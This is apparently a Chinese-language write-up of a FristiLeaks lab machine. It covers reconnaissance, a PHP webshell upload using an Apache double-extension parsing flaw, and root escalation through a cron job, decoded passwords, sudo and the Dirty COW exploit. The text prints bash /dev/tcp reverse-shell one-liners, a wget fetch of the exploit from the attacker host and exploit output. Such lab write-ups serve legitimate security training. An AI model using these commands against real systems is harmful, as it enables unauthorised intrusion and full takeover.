# 靶场搭建
下载下来是个 OVA,通过虚拟机的打开,导入 OVA 虚拟机,导入的过程中会报一次错,直接点重试就可以。
导入进去后添加一个网卡,使用 NAT 模式,并且需要将这张 NAT 模式的网卡的 MAC 地址设置为 08:00:27:A5:A6:76 。在设置中的高级选项卡内
环境配置可见: https://blog.csdn.net/weixin_45744814/article/details/120168008
IP 地址: 192.168.74.138
# 信息收集
# nmap
做一个全端口快速 saomiao
┌──(root㉿kali)-[~] | |
└─# nmap -p- -T5 192.168.74.138 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 04:08 EDT | |
Nmap scan report for bogon (192.168.74.138) | |
Host is up (0.00045s latency). | |
Not shown: 65479 filtered tcp ports (no-response), 55 filtered tcp ports (host-prohibited) | |
PORT STATE SERVICE | |
80/tcp open http | |
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) | |
Nmap done: 1 IP address (1 host up) scanned in 71.77 seconds |
发现只开了 80 端口,这就有点意思了,多半是要做 web 安全噜
# dirsearch
┌──(root㉿kali)-[~] | |
└─# dirsearch -u 192.168.74.138 | |
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html | |
from pkg_resources import DistributionNotFound, VersionConflict | |
_|. _ _ _ _ _ _|_ v0.4.3 | |
(_||| _) (/_(_|| (_| ) | |
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 | |
Output File: /root/reports/_192.168.74.138/_24-04-08_04-10-32.txt | |
Target: http://192.168.74.138/ | |
[04:10:38] Starting: | |
[04:10:41] 403 - 213B - /.ht_wsr.txt | |
[04:10:41] 403 - 216B - /.htaccess.bak1 | |
[04:10:41] 403 - 218B - /.htaccess.sample | |
[04:10:41] 403 - 216B - /.htaccess.save | |
[04:10:41] 403 - 217B - /.htaccess_extra | |
[04:10:41] 403 - 216B - /.htaccess_orig | |
[04:10:41] 403 - 216B - /.htaccess.orig | |
[04:10:41] 403 - 214B - /.htaccess_sc | |
[04:10:41] 403 - 214B - /.htaccessOLD | |
[04:10:41] 403 - 207B - /.html | |
[04:10:41] 403 - 206B - /.htm | |
[04:10:41] 403 - 214B - /.htaccessBAK | |
[04:10:41] 403 - 215B - /.htaccessOLD2 | |
[04:10:41] 403 - 216B - /.htpasswd_test | |
[04:10:41] 403 - 212B - /.htpasswds | |
[04:10:41] 403 - 213B - /.httr-oauth | |
[04:11:04] 403 - 210B - /cgi-bin/ | |
[04:11:13] 403 - 208B - /error/ | |
[04:11:19] 301 - 237B - /images -> http://192.168.74.138/images/ | |
[04:11:19] 200 - 1KB - /images/ | |
[04:11:40] 200 - 62B - /robots.txt | |
Task Completed |
dirsearch 扫了一下也并没有发现什么很有价值的东西
# nikto
┌──(root㉿kali)-[~] | |
└─# nikto -h 192.168.74.138 | |
- Nikto v2.5.0 | |
--------------------------------------------------------------------------- | |
+ Target IP: 192.168.74.138 | |
+ Target Hostname: 192.168.74.138 | |
+ Target Port: 80 | |
+ Start Time: 2024-04-08 04:10:58 (GMT-4) | |
--------------------------------------------------------------------------- | |
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 | |
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 | |
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options | |
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ | |
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file | |
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file | |
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file | |
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt | |
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649 | |
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. | |
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch. | |
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE . | |
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing | |
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support. | |
+ /icons/: Directory indexing found. | |
+ /images/: Directory indexing found. | |
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ | |
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials. | |
+ 8911 requests: 0 error(s) and 17 item(s) reported on remote host | |
+ End Time: 2024-04-08 04:11:32 (GMT-4) (34 seconds) | |
--------------------------------------------------------------------------- | |
+ 1 host(s) tested |
nikto 提示我们在 robots.txt 中有一些东西可能感兴趣
# 想象力
三个目录,点开都是一张突图片,难道是隐写术?没道理啊 ==、
瞧了一眼别人的解题,发现是让我们自己找路径 ==、给的提示就是 THIS IS NOT THE URL 以及首页的图片。
好吧这也算是信息收集的一部分,真抽象啊
猜一猜猜出来 http://192.168.74.138/fristi/ 这个了。像我这种缺乏想象力的人真的头疼,想过用爬虫但是这个页面太分散了,估计也爬不出来,要么就是枚举。但是为什么要去做枚举呢?没有任何道理啊!
# 图片
拿到这这个路径之后打卡看了看,发现是个登录口,感到了困惑
那么现在做两个尝试,SQL 注入和信息收集,我感觉这个靶场偏搞怪,F12 看了一下源代码,发现里面有注释,是 Base64 编码,转了一下发现是个图片,打开图片看了看,里面的文字是: keKkeKKeKKeKkEkkEk 。不确定作用,感觉是嘲讽,尝试当做密码和路径都没有结果
回到 dirsearch 中对这个路径在扫一下,发现 uploads 文件夹,但是没有办法直接访问,说明至少后面有文件上传的内容
思路很卡,翻了半天直接打开了 HTML 源码瞅了瞅,发现还有一个注释没看见
<!-- | |
TODO: | |
We need to clean this up for production. I left some junk in here to make testing easier. | |
- by eezeepz | |
--> |
发现有一个人交 eezeepz ,那么就直接登录了
账号密码: eezeepz/keKkeKKeKKeKkEkkEk
# 漏洞利用
# 文件上传
登录进去之后果然就是一个文件上传页面
随便上传一个 php 文件,发现有限制,后端验证。那就要结合收集到的信息做文件上传绕过了, apache 2.2.15 版本的,干他
查了一下,apache 有解析漏洞,靶场使用了白名单过滤且没有进行文件名重命名。这样可以通过修改后缀名进行上传。上传一个 1.php.jpg 的一句话木马,虽然后缀是 jpg 但是会按照 php 解析。使用蚁剑连接就拿到了低权限 shell。
需要去回顾 apache 的解析漏洞,并且构建利用方式,已经记不清楚了
# 提权
拿到 apache 的 shell 之后就要进行提权了
# 通过提示 sudo 提权
查看用户发现存在三个用户
其中的 eezeepz 用户目录可以访问,打开后里面有一个 notes.txt 进行提示
内容:Jerry 设置了一些自动化检查任务供您使用,但他只允许您访问 /usr/bin/* 系统二进制文件。然而,他还复制了一些常用命令到他的家目录:chmod、df、cat、echo、ps、grep、egrep,这些命令您可以从 /home/admin/ 目录中使用。要运行这些命令,您需要在 /tmp/ 目录中创建一个名为 "runthis" 的文件,每行一个命令。输出将被存储在 /tmp/ 目录中的名为 "cronresult" 的文件中。这些命令应该每分钟以 Jerry 的账户权限运行。
所以我们在 /tmp/runthis 设置命令,每分钟 Jerry 的 admin 权限都会去执行
我在想需要用到定时任务吗?
我尝试用 apache 账号做一些操作,比如查看有没有 sudo 权限,结果 sudo -l 还需要交互 shell。我通过反弹 Bash TCP 弹出来: bash -i >& /dev/tcp/192.168.74.129/1234 0>&1 ,使用 python 提供构建交互式 shell: python -c 'import pty;pty.spawn("/bin/bash")' 。然后执行 sudo -l 发现还需要密码。
使用 apache 账号除非直接用内核提权脚本不然估计不行
还是走计划任务里 admin 账号权限看看
尝试 echo "/usr/bin/../../bin/bash -i > /dev/tcp/192.168.74.129/4455 0<& 2>&1" > /tmp/runthis 获取 shell,但是不行,监听的 nc 直接就死了,不知道什么原因,我猜是因为 tty 并不全的原因,知道的老哥踢我
直接把 admin 的 home 目录设置成所有用户可访问拉倒了: echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
一分钟后就可以进入 admin 目录下了,进入 admin 目录下看到有一些敏感的文件
bash-4.1$ cat /home/admin/whoisyourgodnow.txt | |
cat /home/admin/whoisyourgodnow.txt | |
=RFn0AKnlMHMPIzpyuTI0ITG | |
bash-4.1$ cat /home/admin/cryptedpass.txt | |
cat /home/admin/cryptedpass.txt | |
mVGZ3O3omkJLmy2pcuTq | |
bash-4.1$ cat /home/admin/cryptpass.py | |
cat /home/admin/cryptpass.py | |
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn | |
import base64,codecs,sys | |
def encodeString(str): | |
base64string= base64.b64encode(str) | |
return codecs.encode(base64string[::-1], 'rot13') | |
cryptoResult=encodeString(sys.argv[1]) | |
print cryptoResult |
编写解密函数对两个密码进行解密
#decoderot13.py | |
import base64,codecs,sys | |
def decodeString(str): | |
base64string= codecs.decode(str,'rot13') | |
return base64.b64decode(base64string[::-1]) | |
cryptoResult=decodeString(sys.argv[1]) | |
print cryptoResult |
得到两个密码: LetThereBeFristi! 和 thisisalsopw123 ,分别是 fristigod 和 admin 的密码
登录 fristigod 账号
[admin@localhost uploads]$ su fristigod | |
su fristigod | |
Password: LetThereBeFristi! | |
bash-4.1$ whoami | |
whoami | |
fristigod |
我之前在 admin 上找过了,没有 sudo 权限,fristigod 账号上有
bash-4.1$ sudo -l | |
sudo -l | |
[sudo] password for fristigod: LetThereBeFristi! | |
Matching Defaults entries for fristigod on this host: | |
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS | |
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 | |
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE | |
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY | |
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL | |
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", | |
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin | |
User fristigod may run the following commands on this host: | |
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom |
可以通过 sudo 使用 fristi 身份运行 /var/fristigod/.secret_admin_stuff/doCom ,能够以 root 权限打开一个 bash,就最终拿到 root 权限了
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash | |
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash | |
bash-4.1# whoami | |
whoami | |
root |
# 脏牛提权
搜一下脏牛提权的代码
──(root㉿kali)-[~] | |
└─# searchsploit dirty | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Exploit Title | Path | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c | |
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c | |
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c | |
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp | |
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c | |
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c | |
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c | |
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) | linux/local/50808.c | |
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt | |
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt | |
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt | |
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py | |
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Shellcodes: No Results | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
Paper Title | Path | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- | |
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles | docs/english/42430-dirtytooth-ex | |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- |
符合内核版本的都可以用,我用了那个 40839.c
┌──(root㉿kali)-[~] | |
└─# service apache2 start | |
┌──(root㉿kali)-[~] | |
└─# cp 40839.c /var/www/html |
bash-4.1$ wget http://192.168.74.129/40839.c -O 40839.c | |
wget http://192.168.74.129/40839.c -O 40839.c | |
bash-4.1$ gcc -pthread 40839.c -o dirty -lcrypt | |
gcc -pthread 40839.c -o dirty -lcrypt | |
./dirty 123456 | |
/etc/passwd successfully backed up to /tmp/passwd.bak | |
Please enter the new password: 123456 | |
Complete line: | |
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash | |
mmap: 7fa407cb0000 |
┌──(root㉿kali)-[~] | |
└─# nc -lnvp 1234 | |
listening on [any] 1234 ... | |
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.138] 37326 | |
bash: no job control in this shell | |
bash-4.1$ su firefart | |
su firefart | |
standard in must be a tty | |
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash");' | |
python -c 'import pty;pty.spawn("/bin/bash");' | |
bash-4.1$ su firefart | |
su firefart | |
Password: 123456 | |
[firefart@localhost uploads]# |
拿到了 root 权限
注意编译的时候需要加参数的!
这个命令是使用
gcc编译器来编译一个名为40839.c的源代码文件,并生成一个名为dirty的可执行文件。具体解释如下:
gcc:是 GNU Compiler Collection 的缩写,是一个常用的 C 语言编译器。-pthread:选项用于指示编译器链接 POSIX 线程库,以支持多线程编程。40839.c:是源代码文件的名称,通常以.c作为 C 语言源文件的扩展名。-o dirty:选项用于指定生成的可执行文件的名称为dirty。-lcrypt:选项用于指示编译器链接libcrypt库,该库提供了密码加密和验证功能。综合起来,这个命令的目的是编译
40839.c这个源代码文件,生成一个名为dirty的可执行文件,并在编译过程中链接libcrypt库以支持密码加密和验证功能。
# 小结
- rot13 加密
- 查找有用的信息
- 脏牛提权
- apache 解析漏洞
急需复盘 apache 历史漏洞!研究综合利用方式。
